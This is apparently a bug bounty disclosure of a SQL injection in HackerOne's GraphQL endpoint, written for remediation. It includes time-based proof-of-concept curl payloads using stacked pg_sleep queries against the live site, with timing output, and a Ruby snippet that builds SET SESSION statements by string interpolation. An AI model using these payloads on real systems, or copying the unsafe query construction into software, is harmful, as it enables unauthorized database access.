SQL Injection in GraphQL
Endpoint
Bug 🐞 SQL Injection
Severity Critical (10.0)
Asset ☑️ GraphQL
🎉 Bounty Award None
Reported 👋🏻 Jobert Abma (jobert)
Vulnerability Description:
The embedded_submission_form_uuid parameter in the /graphql endpoint is
vulnerable to SQL injection. By manipulating this parameter, an attacker can
inject arbitrary SQL queries, potentially leading to unauthorized access or data
leakage.
Proof of Concept:
To reproduce the vulnerability:
Execute the following command with the manipulated
embedded_submission_form_uuid parameter:
Locally:
curl -X POST http://localhost:8080/graphql\?embedded_submis
sion_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30
\)%3B--%27
HackerOne.com:
curl -X POST https://hackerone.com/graphql\?embedded_submis
sion_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30
\)%3B--%27
SQL Injection in GraphQL Endpoint 1
Additional Proof:
$ time curl -X POST https://hackerone.com/graphql\?embedded
_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_slee
p\(5\)%3B--%27
{}curl -X POST 0.03s user 0.01s system 0% cpu 5.726 total
$ time curl -X POST https://hackerone.com/graphql\?embedded
_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_slee
p\(1\)%3B--%27
{}curl -X POST 0.03s user 0.01s system 2% cpu 1.631 total
$ time curl -X POST https://hackerone.com/graphql\?embedded
_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_slee
p\(10\)%3B--%27
{}curl -X POST 0.02s user 0.01s system 0% cpu 10.557 tota
l
Impact:
The SQL injection appears to execute within the context of the secure schema.
While the full impact is currently unknown, given the ability for an attacker to
potentially switch schemas, it should be considered as having a high impact on
confidentiality.
Impacted Data:
No exploitation of the vulnerability has been detected. Further details can be
found in the report below.
Root Cause:
The vulnerability stems from the decision to use GraphQL parameters, which
were not properly sanitized, instead of input fields when introducing the
embedded submission form feature. Below is a snippet of the vulnerable code:
unless database_parameters_up_to_date
safe_query = ''
new_parameters.each do |key, value|
😮
safe_query += "SET SESSION #{key} TO #{value};" # <--
SQL Injection in GraphQL Endpoint 2
end
begin
connection.query(safe_query)
rescue ActiveRecord::StatementInvalid => e
# NOTE: when the transaction is aborted, we cannot set
or reset any parameters.
# Changes of previous SET statements are undone as wel
l, so we can safely do
# nothing here
raise e unless e.cause.is_a? PG::InFailedSqlTransaction
end
end
The usage of parameters in PostgreSQL queries is necessitated by the
database having two separate schemas: the public schema and the secure
schema. GraphQL queries default to the secure schema, which returns data
based on user authorization. Despite this, the vulnerability poses a risk to
confidentiality.
Recommendations:
Immediately patch the vulnerability by implementing proper parameter
sanitation in GraphQL queries.
Conduct a thorough security review to identify and address any similar
vulnerabilities in the system.
Consider restricting access to sensitive endpoints or implementing
additional authentication measures to mitigate potential risks.
Reference:
https://hackerone.com/reports/435066
SQL Injection in GraphQL Endpoint 3